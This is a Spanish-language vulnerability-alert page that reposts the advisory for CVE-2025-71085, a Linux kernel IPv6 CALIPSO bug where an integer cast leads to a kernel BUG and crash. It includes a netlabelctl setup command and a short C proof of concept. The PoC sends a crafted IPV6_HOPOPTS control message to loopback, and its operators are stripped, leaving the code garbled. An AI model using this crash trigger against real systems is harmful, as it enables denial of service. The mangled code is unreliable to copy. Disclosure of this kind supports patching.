VulnerAlert



LINUX
13-01-2026 23:33

CVE-2025-71085 Vulnerabilidad documentada

Sin puntuación
Tags
#using
#kernel
#add
#linux
#vulnerability
#cms
#root
#pass
#fix
#bug
Descripción
In the Linux kernel, following vulnerability has been resolved: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() There exists a kernel oops caused by BUG_ON(nhead < 0) at net/core/skbuff.c:2232 pskb_expand_head(). This bug is triggered calipso_skbuff_setattr() routine when skb_cow() passed headroom > INT_MAX (i.e. (int)(skb_headroom(skb) + len_delta) 0). The root cause due to an implicit integer cast in __skb_cow(). The check (headroom skb_headroom(skb)) meant ensure that delta = - skb_headroom(skb) never negative, otherwise we will trigger BUG_ON pskb_expand_head(). However, if headroom INT_MAX and <= -NET_SKB_PAD, passes, delta becomes negative value for nhead. Fix condition calipso_skbuff_setattr(). Avoid passing "negative" sizes within calipso_skbuff_setattr() by only using grow headroom. PoC: Using `netlabelctl` tool: netlabelctl map del default calipso add pass doi:7 default address:0::1/128 protocol:calipso,7 Then run PoC: int fd socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP); // setup msghdr cmsg_size 2; cmsg_len 0x60; struct msghdr msg; sockaddr_in6 dest_addr; cmsghdr * cmsg (struct *) calloc(1, sizeof(struct cmsghdr) cmsg_len); msg.msg_name &dest_addr; msg.msg_namelen sizeof(dest_addr); msg.msg_iov NULL; msg.msg_iovlen 0; msg.msg_control cmsg; msg.msg_controllen cmsg_len; msg.msg_flags 0; sockaddr dest_addr.sin6_family AF_INET6; dest_addr.sin6_port htons(31337); dest_addr.sin6_flowinfo htonl(31337); dest_addr.sin6_addr in6addr_loopback; dest_addr.sin6_scope_id 31337; cmsghdr cmsg->cmsg_len cmsg->cmsg_level IPPROTO_IPV6; cmsg->cmsg_type IPV6_HOPOPTS; char hop_hdr (char *)cmsg cmsghdr); hop_hdr[1] 0x9; //set hop size (0x9 1) 8 80 sendmsg(fd, &msg, 0);
https://git.kernel.org/stable/c/2bb759062efa188ea5d07242a43e5aa5464bbae1
https://git.kernel.org/stable/c/58fc7342b529803d3c221101102fe913df7adb83
https://git.kernel.org/stable/c/73744ad5696dce0e0f43872aba8de6a83d6ad570
https://git.kernel.org/stable/c/bf3709738d8a8cc6fa275773170c5c29511a0b24
https://git.kernel.org/stable/c/c53aa6a5086f03f19564096ee084a202a8c738c0
Referencia
Link externo
Ver detalles

Fuente
https://nvd.nist.gov/vuln/detail/CVE-2025-71085
Resultados similares
Coincidentes en almenos en 50% de los tags
13-01-2026 CVE-2025-68795
In the Linux kernel, the following vulnerability has been resolved: ethtool: Avoid overflowing...
Ver información
13-01-2026
Linux : openSUSE Leap 16.0: matio Important Fixes CVE-2025-2337 CVE-2025-2338 An update that so...
Ver información
Icons made by Freepik from www.flaticon.com
Este Proyecto fue cofinanciado por el Consejo Nacional de Ciencia y Tecnología (CONACYT) a través del PROINNOVA 2021/2023
Proyecto realizado por